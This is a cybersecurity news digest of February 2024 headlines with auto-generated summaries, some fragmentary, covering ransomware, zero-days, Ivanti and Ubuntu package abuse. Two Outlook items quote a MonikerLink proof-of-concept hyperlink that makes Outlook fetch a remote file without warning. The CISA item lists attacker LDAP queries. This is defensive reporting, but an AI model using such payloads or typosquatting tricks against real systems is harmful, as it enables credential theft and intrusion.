            A reverse engineering of the firmware running on Ivanti Pulse Secure appliances has revealed numerous weaknesses, once again underscoring the challenge of securing software supply chains. Eclypsium, which acquired firmware version 9.1.18.2-24467.1 as part of the process, said the base operating system used by the Utah-based software company for the device is CentOS 6.4. "Pulse Secure runs an

            Autosummary: In an alert published yesterday, web infrastructure company Akamai said it has observed "significant scanning activity" targeting CVE-2024-22024 starting February 9, 2024, following the publication of a proof-of-concept (PoC) by watchTowr.


            US offers up to $15 million for tips on ALPHV ransomware gang

            exploits ransomware
            2024-02-15 https://www.bleepingcomputer.com/news/security/us-offers-up-to-15-million-for-tips-on-alphv-ransomware-gang/
            The U.S. State Department is offering rewards of up to $10 million for information that could lead to the identification or location of ALPHV/Blackcat ransomware gang leaders. [...]

            Autosummary: The State Department previously announced bounties of up to $15 million for tips on members and affiliates of the Hive, Clop, Conti [1, 2], REvil (Sodinokibi), and Darkside ransomware operations.


            FBI disrupts Moobot botnet used by Russian military hackers

            rusia-ucrania
            2024-02-15 https://www.bleepingcomputer.com/news/security/fbi-disrupts-moobot-botnet-used-by-russian-military-hackers/
            The FBI took down a botnet of small office/home office (SOHO) routers used by Russia's Main Intelligence Directorate of the General Staff (GRU) to proxy malicious traffic and to target the United States and its allies in spearphishing and credential theft attacks. [...]

            Autosummary: "Additionally, in order to neutralize the GRU's access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers' firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation," the Justice Department said.


            A cyberattack halted operations at Varta production plants

            ciber
            2024-02-15 https://securityaffairs.com/159190/hacking/cyberattack-halted-varta-production-plants.html
            On February 12, 2023, a cyber attack halted operations at five production plants of German battery manufacturer Varta. On February 13, German battery manufacturer Varta announced that a cyber attack forced the company to shut down IT systems. The attack disrupted operations at five production plants and the administration. VARTA AG is a leading global […]

            Autosummary: Pierluigi Paganini, February 15, 2024. On February 12, 2023, a cyber attack halted operations at five production plants of German battery manufacturer Varta.


            Zeus, IcedID malware gangs leader pleads guilty, faces 40 years in prison

            exploits
            2024-02-15 https://www.bleepingcomputer.com/news/security/zeus-icedid-malware-gangs-leader-pleads-guilty-faces-40-years-in-prison/
            Ukrainian national Vyacheslav Igorevich Penchukov, one of the heads of the notorious JabberZeus cybercrime gang, has pleaded guilty to charges related to his leadership roles in the Zeus and IcedID malware groups. [...]

            Autosummary: The U.S. Department of Justice first charged him in 2012 for his involvement in the Zeus malware operation and the theft of millions of dollars using personal identification numbers, bank account numbers, credentials, and other sensitive info stolen from infected devices.


            All eyes on AI | Unlocked 403: A cybersecurity podcast

            ciber
            2024-02-15 https://www.welivesecurity.com/en/videos/ai-unlocked-403-cybersecurity-podcast/
            Artificial intelligence is on everybody’s lips these days, but there are also many misconceptions about what AI actually is and isn’t. We unpack the basics and examine AI's broader implications.

            Autosummary: "


            FBI disrupts Russian Moobot botnet infecting Ubiquiti routers

            rusia-ucrania
            2024-02-15 https://www.bleepingcomputer.com/news/security/fbi-disrupts-russian-moobot-botnet-infecting-ubiquiti-routers/
            The FBI took down a botnet of small office/home office (SOHO) routers used by Russia's Main Intelligence Directorate of the General Staff (GRU) to proxy malicious traffic and to target the United States and its allies in spearphishing and credential theft attacks. [...]

            Autosummary: "Additionally, in order to neutralize the GRU's access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers' firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation," the Justice Department said.


            Cybercriminals get productivity boost with AI

            ciber
            2024-02-14 https://www.helpnetsecurity.com/2024/02/14/ai-technology-cybersecurity-risks/

            While AI technology has the potential to streamline and automate processes for beneficial outcomes, it also comes with an equal number of risks to data protection, cybersecurity, and other ethical concerns, according to iProov. Digital ecosystems continue to grow and multiply at record levels as organizations and governments seek to provide remote access and services to meet consumer and workforce demand. However, this growth’s unintended side effect is an ever-expanding attack surface that, coupled with … More

            The post Cybercriminals get productivity boost with AI appeared first on Help Net Security.

            "

            Autosummary: However, in 2023, malicious actors exploited a loophole in some systems by using cyber tools, such as emulators, to conceal the existence of virtual cameras, making it harder for biometric solution providers to detect.


            Threat actors intensify focus on NATO member states

            government
            2024-02-14 https://www.helpnetsecurity.com/2024/02/14/nato-member-states-cyberthreat/

            Initial access brokers (IABs) are increasingly targeting entities within NATO member states, indicating a persistent and geographically diverse cyberthreat landscape, according to Flare. IABs infiltrate systems and gain unauthorized access through various techniques, including spear-phishing, exploiting unpatched vulnerabilities, and leveraging leaked and stolen credentials, with the primary goal of establishing persistence in these environments. Leaked credentials and cookies from stealer logs can be a common vector for IABs to gain initial access. Flare analyzed hundreds … More

            The post Threat actors intensify focus on NATO member states appeared first on Help Net Security.

            "

            Autosummary: The cautious approach of sellers on forums like Exploit, who often withhold sensitive details to avoid victim identification, is an example of the ongoing cat-and-mouse game between cybercriminals, researchers, and law enforcement.


            Rise in cyberwarfare tactics fueled by geopolitical tensions

            industry ciber
            2024-02-14 https://www.helpnetsecurity.com/2024/02/14/matt-shelton-google-cloud-threat-actors-trends/

            In this Help Net Security interview, Matt Shelton, Head of Threat Research and Analysis at Google Cloud, discusses the latest Threat Horizons Report, which provides intelligence-derived trends, expertise, and recommendations on threat actors to help inform cloud customer security strategies in 2024. How have cyber threats evolved over the last year, and what trends are we seeing regarding attack vectors and methodologies? To some extent, cybersecurity fatigue and complacency have left gaps where threat actors … More

            The post Rise in cyberwarfare tactics fueled by geopolitical tensions appeared first on Help Net Security.

            "

            Autosummary: Caveat, when talking about public-private partnerships: what is needed is real operational and ongoing public-private collaboration, which is essential for sharing information, developing best practices, and mitigating risks, and for building a more secure and resilient cyber ecosystem. To some extent, cybersecurity fatigue and complacency have left gaps where threat actors have exploited old vulnerabilities, including gaps in logging and patching, to get a stalwart beachhead into the network.


            DarkMe Malware Targets Traders Using Microsoft SmartScreen Zero-Day Vulnerability

            exploits
            2024-02-14 https://thehackernews.com/2024/02/darkme-malware-targets-traders-using.html
            A newly disclosed security flaw in the Microsoft Defender SmartScreen has been exploited as a zero-day by an advanced persistent threat actor called Water Hydra (aka DarkCasino) targeting financial market traders. Trend Micro, which began tracking the campaign in late December 2023, said it entails the exploitation of CVE-2024-21412, a security bypass vulnerability related to Internet

            Autosummary: The infection procedure documented by Trend Micro exploits CVE-2024-21412 to drop a malicious installer file ("7z.msi") by clicking on a booby-trapped URL ("fxbulls[.]ru") distributed via forex trading forums under the pretext of sharing a link to a stock chart image that, in reality, is an internet shortcut file ("photo_2023-12-29.jpg.url").


            Microsoft Rolls Out Patches for 73 Flaws, Including 2 Windows Zero-Days

            exploits
            2024-02-14 https://thehackernews.com/2024/02/microsoft-rolls-out-patches-for-73.html
            Microsoft has released patches to address 73 security flaws spanning its software lineup as part of its Patch Tuesday updates for February 2024, including two zero-days that have come under active exploitation. Of the 73 vulnerabilities, 5 are rated Critical, 65 are rated Important, and three are rated Moderate in severity. This is in addition to 24 flaws that have been fixed

            Autosummary: Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability (CVSS score: 7.5); CVE-2024-21380 (CVSS score: 8.0) - Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability; CVE-2024-21410 (CVSS score: 9.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability; CVE-2024-21413 (CVSS score: 9.8) - Microsoft Outlook Remote Code Execution Vulnerability. "CVE-2024-21410 is an elevation of privilege vulnerability in Microsoft Exchange Server," Satnam Narang, senior staff research engineer at Tenable, said in a statement. Water Hydra, first detected in 2021, has a track record of launching attacks against banks, cryptocurrency platforms, trading services, gambling sites, and casinos to deliver a trojan called DarkMe using zero-day exploits, including the WinRAR flaw that came to light in August 2023 (CVE-2023-38831, CVSS score: 7.8).


            Microsoft Patch Tuesday for February 2024 fixed 2 actively exploited 0-days

            exploits
            2024-02-14 https://securityaffairs.com/159106/security/microsoft-patch-tuesday-for-february-2024.html
            Microsoft Patch Tuesday security updates for February 2024 addressed 72 flaws, two of which are actively exploited in the wild. Microsoft Patch Tuesday security updates for February 2024 resolved a total of 72 vulnerabilities, including two actively exploited zero-days. The vulnerabilities affect Microsoft Windows and Windows Components; Office and Office Components; Azure; .NET Framework and […]

            Autosummary: "


            Cybersecurity Tactics FinServ Institutions Can Bank On in 2024

            financial industry ciber
            2024-02-14 https://thehackernews.com/2024/02/cybersecurity-tactics-finserv.html
            The landscape of cybersecurity in financial services is undergoing a rapid transformation. Cybercriminals are exploiting advanced technologies and methodologies, making traditional security measures obsolete. The challenges are compounded for community banks that must safeguard sensitive financial data against the same level of sophisticated threats as larger institutions, but often with more

            Autosummary: Financial firms report 703 cyberattack attempts per week [1]. On average, 270 attacks (entailing unauthorized access of data, applications, networks, or devices) occurred in financial services, an increase of 31% compared with the prior year [2]. Financial services businesses take an average of 233 days to detect and contain a data breach [3]. 43% of senior bank executives don't believe their bank is adequately equipped to protect customer data, privacy, and assets in the event of a cyberattack [4]. The average data breach cost in financial services is $5.72 million per incident [5]. State-sponsored cyberattacks also pose a unique threat to the financial sector. Similarly, in recent times, there has been a concerning trend where major service providers catering to small-medium-sized banks, such as FIS, Fiserv, and Jack Henry, have become prime targets for cyber-attacks. To effectively navigate this landscape, community banks must develop a deep understanding of relevant regulations, such as the GLBA, PCI DSS, SOX, and more. Advanced Cloud Security Strategies: Cloud computing, with its numerous benefits of scalability, flexibility, and cost-effectiveness, is increasingly being adopted by financial institutions. This involves creating a cohesive framework that combines advanced technology solutions, thorough policies and procedures, regular risk assessments, continuous monitoring, and proactive incident response planning. Additionally, outsourcing executive-level insights, such as a virtual Chief Information Security Officer (vCISO), can provide strategic guidance and governance to strengthen the bank's overall cybersecurity posture.


            Bumblebee Malware Returns with New Tricks, Targeting U.S. Businesses

            exploits
            2024-02-14 https://thehackernews.com/2024/02/bumblebee-malware-returns-with-new.html
            The infamous malware loader and initial access broker known as Bumblebee has resurfaced after a four-month absence as part of a new phishing campaign observed in February 2024. Enterprise security firm Proofpoint said the activity targets organizations in the U.S. with voicemail-themed lures containing links to OneDrive URLs. "The URLs led to a Word file with names such as "

            Autosummary: "The takedown of the QakBot botnet infrastructure was a victory, but the bot's creators remain free, and someone who has access to QakBot's original source code has been experimenting with new builds and testing the waters with these latest variants," Andrew Brandt, principal researcher at Sophos X-Ops, said.


            German battery maker Varta halts production after cyberattack

            ciber
            2024-02-14 https://www.bleepingcomputer.com/news/security/german-battery-maker-varta-halts-production-after-cyberattack/
            Battery maker VARTA AG announced yesterday that it was targeted by a cyberattack that forced it to shut down IT systems, causing production to stop at its plants. [...]

            Autosummary: "


            Ubuntu "command-not-found" tool can be abused to spread malware

            exploits Linux
            2024-02-14 https://www.bleepingcomputer.com/news/security/ubuntu-command-not-found-tool-can-be-abused-to-spread-malware/
            A logic flaw between Ubuntu's "command-not-found" package suggestion system and the snap package repository could enable attackers to promote malicious Linux packages to unsuspecting users. [...]

            Autosummary: The first and most simple trick is to associate commands containing typing errors (e.g., "ifconfigg" instead of "ifconfig") with malicious snap packages, leading the "command-not-found" utility to suggest the installation of malware to the user, who is unlikely to realize their typo at that point. Typo-squatting and impersonation risks: All the above lays the ground for a risky situation as long as attackers find a way to promote their packages through the "command-not-found" utility, but as the analysts explain, there's a comfortable margin for that, too.


            Trans-Northern Pipelines investigating ALPHV ransomware attack claims

            exploits ransomware
            2024-02-14 https://www.bleepingcomputer.com/news/security/trans-northern-pipelines-investigating-alphv-ransomware-attack-claims/
            Trans-Northern Pipelines (TNPI) has confirmed its internal network was breached in November 2023 and that it's now investigating claims of data theft made by the ALPHV/BlackCat ransomware gang. [...]

            Autosummary: "ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—, demanded over $500 million, and received nearly $300 million in ransom payments," the FBI said in December.


            How ransomware changed in 2023

            exploits ransomware
            2024-02-14 https://www.malwarebytes.com/blog/cybercrime/2024/02/how-ransomware-changed-in-2023
            In 2023, the CL0P ransomware gang broke the scalability barrier and shook the security world with a series of short, automated campaigns.

            Autosummary: Broadly speaking, an attack requires a team of people that: breaks into an internet-connected computer, researches the target to see if they’re worth the effort of an attack, explores their network, elevates their privileges until they’re an all-conquering administrator, steals and stores terabytes of data, attacks security software and backups, positions ransomware, runs it, and then conducts negotiations.


            Malwarebytes crushes malware all the time

            exploits
            2024-02-14 https://www.malwarebytes.com/blog/news/2024/02/malwarebytes-crushes-malware-all-the-time
            The PC Security Channel tested Malwarebytes against 2015 files. Here's how we did.

            Autosummary: As you can see in the sheet below (click to expand), after a full review we were left with four malicious files that we missed and the two PUP-related files.


            Update now! Microsoft fixes two zero-days on February Patch Tuesday

            exploits
            2024-02-14 https://www.malwarebytes.com/blog/news/2024/02/update-now-microsoft-fixes-two-zero-days-on-february-patch-tuesday
            Microsoft has issued patches for 73 security vulnerabilities in its February 2024 Patch Tuesday.

            Autosummary: Adobe has released security updates to address vulnerabilities in several products: The Android Security Bulletin for February contains details of security vulnerabilities for patch level 2024-02-05 or later.


            How are state-sponsored threat actors leveraging AI?

            government
            2024-02-14 https://www.helpnetsecurity.com/2024/02/14/threat-actors-llms/

            Microsoft and OpenAI have identified attempts by various state-affiliated threat actors to use large language models (LLMs) to enhance their cyber operations. Threat actors use LLMs for various tasks Just as defenders do, threat actors are leveraging AI (more specifically: LLMs) to boost their efficiency and continue to explore all the possibilities these technologies can offer. Microsoft and OpenAI have shared how different known state-backed adversaries have been using LLMs: Russian military intelligence actor Forest … More

            The post How are state-sponsored threat actors leveraging AI? appeared first on Help Net Security.

            "

            Autosummary: "


            Microsoft, OpenAI Warn of Nation-State Hackers Weaponizing AI for Cyberattacks

            government ciber
            2024-02-14 https://thehackernews.com/2024/02/microsoft-openai-warn-of-nation-state.html
            Nation-state actors associated with Russia, North Korea, Iran, and China are experimenting with artificial intelligence (AI) and large language models (LLMs) to complement their ongoing cyber attack operations. The findings come from a report published by Microsoft in collaboration with OpenAI, both of which said they disrupted efforts made by five state-affiliated actors that used its "

            Autosummary: "


            Ubuntu "command-not-found" Tool Could Trick Users into Installing Rogue Packages

            Linux
            2024-02-14 https://thehackernews.com/2024/02/ubuntu-command-not-found-tool-could.html
            Cybersecurity researchers have found that it's possible for threat actors to exploit a well-known utility called command-not-found to recommend their own rogue packages and compromise systems running Ubuntu operating system. "While "command-not-found" serves as a convenient tool for suggesting installations for uninstalled commands, it can be inadvertently manipulated by attackers through the "

            Autosummary: "This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named 'jupyter-notebook.'" To make matters worse, the command-not-found utility suggests the snap package above the legitimate APT package for jupyter-notebook, misleading users into installing the fake snap package. "


            Microsoft: New critical Outlook RCE bug exploited as zero-day

            exploits
            2024-02-14 https://www.bleepingcomputer.com/news/security/microsoft-new-critical-outlook-rce-bug-exploited-as-zero-day/
            Microsoft updated a security advisory today to warn that a critical Outlook bug was exploited in attacks as a zero-day before being fixed during this month's Patch Tuesday. [...] "

            Autosummary: The exclamation mark is added right after the document extension, together with some random text (in their example, Check Point used "something"), as shown below: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* This type of hyperlink bypasses Outlook security restriction, and Outlook will access the "\\10.10.111.111\test\test.rtf" remote resource when the link is clicked without throwing any warnings or errors. "


            See me speak at webinar about data security for financial services

            financial
            2024-02-14 https://grahamcluley.com/see-me-speak-at-webinar-about-data-security-for-financial-services/
            Join me and Metomic CEO Richard Vibert for a discussion about some of the cybersecurity challenges faced by the financial services industry, and how you can best protect your organisations. Sign up now for the free event on February 29 2024. "

            Autosummary: "


            Microsoft: New critical Exchange bug exploited as zero-day

            exploits
            2024-02-14 https://www.bleepingcomputer.com/news/security/microsoft-new-critical-exchange-bug-exploited-as-zero-day/
            Microsoft warned today in an updated security advisory that a critical vulnerability in Exchange Server was exploited as a zero-day before being fixed during this month's Patch Tuesday. [...] "

            Autosummary: Today, Microsoft also mistakenly tagged a critical Outlook remote code execution (RCE) vulnerability (CVE-2024-21413) as exploited in attacks before being fixed during this month's Patch Tuesday. "


            LockBit claims ransomware attack on Fulton County, Georgia

            exploits government ransomware
            2024-02-14 https://www.bleepingcomputer.com/news/security/lockbit-claims-ransomware-attack-on-fulton-county-georgia/
            The LockBit ransomware gang claims to be behind the recent cyberattack on Fulton County, Georgia, and is threatening to publish "confidential" documents if a ransom is not paid. [...] "

            Autosummary: LockBit promises “maximum publicity”. On Tuesday, the LockBit ransomware group claimed responsibility for the attack on Fulton County, publishing 25 screenshots to prove they had gained access to the county’s systems and that they had stolen sensitive data. "


            New critical Microsoft Outlook RCE bug is trivial to exploit

            exploits
            2024-02-14 https://www.bleepingcomputer.com/news/security/new-critical-microsoft-outlook-rce-bug-is-trivial-to-exploit/
            Microsoft says remote unauthenticated attackers can trivially exploit a critical Outlook security vulnerability that also lets them bypass the Office Protected View. [...] "

            Autosummary: The exclamation mark is added right after the document extension, together with some random text (in their example, Check Point used "something"), as shown below: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* This type of hyperlink bypasses Outlook security restriction, and Outlook will access the "\\10.10.111.111\test\test.rtf" remote resource when the link is clicked without throwing any warnings or errors. "


            Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages

            Linux
            2024-02-14 https://securityaffairs.com/159129/security/ubuntu-command-not-found-attack.html
            Researchers reported that attackers can exploit the ‘command-not-found’ utility to trick users into installing rogue packages on Ubuntu systems. Cybersecurity researchers from cloud security firm Aqua discovered that it is possible to abuse the popular utility called ‘command-not-found’, which can lead to deceptive recommendations of malicious packages. “Aqua Nautilus researchers have identified a security issue […] "

            Autosummary: Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages, Pierluigi Paganini, February 14, 2024. Researchers reported that attackers can exploit the ‘command-not-found’ utility to trick users into installing rogue packages on Ubuntu systems. "


            The art of digital sleuthing: How digital forensics unlocks the truth

            industry
            2024-02-14 https://www.welivesecurity.com/en/cybersecurity/digital-forensics-unlocks-truth/
            Learn how the cyber variety of CSI works, from sizing up the crime scene and hunting for clues to piecing together the story that the data has to tell "

            Autosummary: As such, a typical digital forensics report: provides background information on the case; defines the scope of the investigation together with its objectives and limitations; describes the methods and techniques used; details the process of acquiring and preserving digital evidence; presents the results of the analysis, including discovered artifacts, timelines, and patterns; and summarizes the findings and their significance in relation to the goals of the investigation. Lest we forget: the report needs to adhere to legal standards and requirements so that it can withstand legal scrutiny and serve as a crucial document in legal proceedings. With that in mind, digital forensics has a role to play in various contexts, including crime investigations, incident response, divorce and other legal proceedings, employee misconduct probes, counterterrorism efforts, fraud detection and data recovery. This art of uncovering, analyzing and interpreting digital evidence has seen substantial growth particularly in investigations involving various kinds of fraud and cybercrime, tax evasion, stalking, child exploitation, intellectual property theft, and even terrorism. "


            Threat Actor Leverages Compromised Account of Former Employee to Access State Government Organization

            government
            2024-02-14 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-046a

            SUMMARY

            The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) conducted an incident response assessment of a state government organization’s network environment after documents containing host and user information, including metadata, were posted on a dark web brokerage site. Analysis confirmed that an unidentified threat actor compromised network administrator credentials through the account of a former employee—a technique commonly leveraged by threat actors—to successfully authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.[1] Analysis also focused on the victim’s Azure environment, which hosts sensitive systems and data, as well as the compromised on-premises environment. Analysis determined there were no indications the threat actor further compromised the organization by moving laterally from the on-premises environment to the Azure environment.

            CISA and MS-ISAC are releasing this Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) used by the threat actor and methods to protect against similar exploitation of both unnecessary and privileged accounts.

            Download the PDF version of this report:

            TEC "

            Autosummary: Analysis confirmed that an unidentified threat actor compromised network administrator credentials through the account of a former employee—a technique commonly leveraged by threat actors—to successfully authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.[1] Analysis also focused on the victim’s Azure environment, which hosts sensitive systems and data, as well as the compromised on-premises environment.

            Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or MS-ISAC.

            Table 1: LDAP Queries Conducted by the Threat Actor

            Query: LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)
            Description: Collects names and metadata of users in the domain.

            Query: LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Trusted-Domain,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)
            Description: Collects trust information in the domain.

            Query: LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Computer,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)
            Description: Collects names and metadata of hosts in the domain.

            in the Azure tenant to restrict potentially harmful permissions including:

            Create a Forensically Ready Organization: Collect access- and security-focused logs (e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and virtual private network) for use in both detection and incident response activities.

            CISA and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.

            Conditional access policies also account for common signals, such as user or group memberships, IP location information, device, application, and risky sign-in behavior identified through integration with Azure AD Identity Protection.

            SUMMARY: The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) conducted an incident response assessment of a state government organization’s network environment after documents containing host and user information, including metadata, were posted on a dark web brokerage site.

            Untitled Goose Tool: Incident responders collected Azure and Microsoft Defender for Endpoint (MDE) logs using CISA’s Untitled Goose Tool—a free tool to help network defenders detect potentially malicious activity in Microsoft Azure, Azure Active Directory (AAD), and Microsoft 365 (M365) environments.

            Threat actors commonly leverage valid accounts, including accounts of former employees that have not been properly removed from the Active Directory (AD), to gain access to organizations.[1] CISA and MS-ISAC assessed that an unidentified threat actor likely accessed documents containing host and user information to post on the dark web for profit after gaining access through the account of a former employee. Users without administrative privileges cannot change settings; however, they can view user info, group info, device details, and user privileges. "


            How purple teaming enhances inter-team collaboration and effectiveness in cybersecurity

            ciber
            2024-02-13 https://www.helpnetsecurity.com/2024/02/13/purple-teaming-effectiveness-video/

            In this Help Net Security video, Andrew Costis, Chapter Lead of the Adversary Research Team at AttackIQ, discusses how purple teaming allows security teams to break down barriers between teams and increase operational effectiveness. It’s no longer about team red vs. team blue. It’s time to think about team purple. This security force blends offensive and defensive minds, blurring lines and boosting defenses. No more adversarial silos, just collaborative cycles and shared intel. Imagine red … More

            The post How purple teaming enhances inter-team collaboration and effectiveness in cybersecurity appeared first on Help Net Security.

            "

            Autosummary: "


            The future of cybersecurity: Anticipating changes with data analytics and automation

            industry ciber
            2024-02-13 https://www.helpnetsecurity.com/2024/02/13/mick-baccio-splunk-data-analytics-automation-role/

            In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses the future of cybersecurity, emphasizing the importance of data analytics and automation in addressing evolving threats. He points out the changes in threat tactics, the significance of automation in reducing human error, challenges in implementing data analytics, and envisions a future where AI-assistants transform cybersecurity operations. How have cybersecurity threats evolved in recent years, and what role do data analytics … More

            The post The future of cybersecurity: Anticipating changes with data analytics and automation appeared first on Help Net Security.

            "

            Autosummary: The landscape of cyber threats continues to further evolve, and recent high-profile data breaches (MOVEit, Accellion, GoAnywhere, etc.) underscore the gravity of the shift. For instance, complex multi-step incident response workflows, such as quarantining a host, blocking an indicator, and searching for additional compromised assets, can be automated to minimize the likelihood of costly oversights or missed steps. In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses the future of cybersecurity, emphasizing the importance of data analytics and automation in addressing evolving threats. "


            Ivanti Vulnerability Exploited to Install "DSLog" Backdoor on 670+ IT Infrastructures

            exploits
            2024-02-13 https://thehackernews.com/2024/02/ivanti-vulnerability-exploited-to.html
            Threat actors are leveraging a recently disclosed security flaw impacting Ivanti Connect Secure, Policy Secure, and ZTA gateways to deploy a backdoor codenamed DSLog on susceptible devices. That's according to findings from Orange Cyberdefense, which said it observed the exploitation of CVE-2024-21893 within hours of the public release of the proof-of-concept (PoC) code. "

            Autosummary: CVE-2024-21893, which was disclosed by Ivanti late last month alongside CVE-2024-21888, refers to a server-side request forgery (SSRF) vulnerability in the SAML module that, if successfully exploited, could permit access to otherwise restricted resources sans any authentication. "


            Roundcube webmail XSS vulnerability exploited by attackers (CVE-2023-43770)

            exploits
            2024-02-13 https://www.helpnetsecurity.com/2024/02/13/cve-2023-43770/

            CVE-2023-43770, a vulnerability in the Roundcube webmail software that has been fixed in September 2023, is being exploited by attackers in the wild, CISA has warned by adding the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. About CVE-2023-43770 Roundcube is an open-source, browser-based IMAP client with an application-like user interface. CVE-2023-43770 is a vulnerability that allows attackers to mount cross-site scripting (XSS) attacks through specially crafted links in plain text email messages. The vulnerability … More

            The post Roundcube webmail XSS vulnerability exploited by attackers (CVE-2023-43770) appeared first on Help Net Security.

            "

            Autosummary: "


            Midnight Blizzard and Cloudflare-Atlassian Cybersecurity Incidents: What to Know

            ciber
            2024-02-13 https://thehackernews.com/2024/02/midnight-blizzard-and-cloudflare.html
            The Midnight Blizzard and Cloudflare-Atlassian cybersecurity incidents raised alarms about the vulnerabilities inherent in major SaaS platforms. These incidents illustrate the stakes involved in SaaS breaches — safeguarding the integrity of SaaS apps and their sensitive data is critical but is not easy. Common threat vectors such as sophisticated spear-phishing, misconfigurations and "

            Autosummary: A SaaS Security Posture Management (SSPM) platform like AppOmni can help with detecting and alerting on: Initial Access: Out-of-the-box rules to detect credential compromise, including password spraying, brute force attacks, and unenforced MFA policies. Persistence: Scan and identify OAuth permissions and detect OAuth hijacking. Recreation of illustration by Amitai Cohen. Cloudflare-Atlassian Breach: On Thanksgiving Day, November 23, 2023, Cloudflare's Atlassian systems were also compromised by a nation-state attack. "


            Bumblebee malware attacks are back after 4-month break

            exploits
            2024-02-13 https://www.bleepingcomputer.com/news/security/bumblebee-malware-attacks-are-back-after-4-month-break/
            The Bumblebee malware has returned after a four-month vacation, targeting thousands of organizations in the United States in phishing campaigns. [...] "

            Autosummary: Phishing email spreading Bumblebee Source: Proofpoint The emails contain a OneDrive URL that downloads a Word document named "ReleaseEvans#96.docm" or something similar, with a lure pretending to be from consumer electronics company hu.ma.ne, known for its AI-powered pin. "


            Remote Monitoring & Management software used in phishing attacks

            financial
            2024-02-13 https://www.malwarebytes.com/blog/cybercrime/2024/02/remote-monitoring-management-software-used-in-phishing-attacks
            Threat actors are abusing commercial remote software like AnyDesk to phish users and defraud them. "

            Autosummary: Remote Monitoring & Management (RMM) software, including popular tools like AnyDesk, Atera, and Splashtop, are invaluable for IT administrators today, streamlining tasks and ensuring network integrity from afar. Try ThreatDown bundles today For IT teams plagued by the triad of complex deployment, scattered tooling, and excessive alert noise, ThreatDown bundles emerge as a superior solution that caters to the needs of today’s security teams. "


            Patch now! Roundcube mail servers are being actively exploited

            exploits
            2024-02-13 https://www.malwarebytes.com/blog/news/2024/02/patch-now-roundcube-mail-server-vulnerability-is-being-exploited
            A vulnerability in Roundcube webmail is being actively exploited and CISA is urging users to install an updated version. "

            Autosummary: In this case it appears that attackers can send plain text emails to Roundcube users with XSS links in them, but Roundcube does not sanitize the links, and, of course, stores the email, creating persistence. "


            PikaBot Resurfaces with Streamlined Code and Deceptive Tactics

            industry
            2024-02-13 https://thehackernews.com/2024/02/pikabot-resurfaces-with-streamlined.html
            The threat actors behind the PikaBot malware have made significant changes to the malware in what has been described as a case of "devolution." "Although it appears to be in a new development cycle and testing phase, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications," Zscaler ThreatLabz researcher Nikolaos "

            Autosummary: "


            Hackers used new Windows Defender zero-day to drop DarkMe malware

            exploits
            2024-02-13 https://www.bleepingcomputer.com/news/security/hackers-used-new-windows-defender-zero-day-to-drop-darkme-malware/
            Microsoft has patched today a Windows Defender SmartScreen zero-day exploited in the wild by a financially motivated threat group to deploy the DarkMe remote access trojan (RAT). [...] "

            Autosummary: Other vendors later linked CVE-2023-38831 exploitation to multiple government-backed hacking groups, including the Sandworm, APT28, APT40, DarkPink (NSFOCUS), and Konni (Knownsec) threat groups from Russia, China, and North Korea. "


            Integris Health says data breach impacts 2.4 million patients

            financial
            2024-02-13 https://www.bleepingcomputer.com/news/security/integris-health-says-data-breach-impacts-24-million-patients/
            Integris Health has reported to U.S. authorities that the data breach it suffered last November exposed personal information belonging to almost 2.4 million people. [...] "

            Autosummary: "


            Microsoft February 2024 Patch Tuesday fixes 2 zero-days, 73 flaws

            exploits
            2024-02-13 https://www.bleepingcomputer.com/news/microsoft/microsoft-february-2024-patch-tuesday-fixes-2-zero-days-73-flaws/
            Today is Microsoft's February 2024 Patch Tuesday, which includes security updates for 73 flaws and two actively exploited zero-days. [...] "

            Autosummary: The number of bugs in each vulnerability category is listed below: 16 Elevation of Privilege Vulnerabilities; 3 Security Feature Bypass Vulnerabilities; 30 Remote Code Execution Vulnerabilities; 5 Information Disclosure Vulnerabilities; 9 Denial of Service Vulnerabilities; 10 Spoofing Vulnerabilities. The total count of 73 flaws does not include 6 Microsoft Edge flaws fixed on February 8th and 1 Mariner flaw. "


            Apple is ramping up its fight against malware

            exploits
            2024-02-13 https://www.computerworld.com/article/3712865/apple-is-ramping-up-its-fight-against-malware.html#tk.rss_security

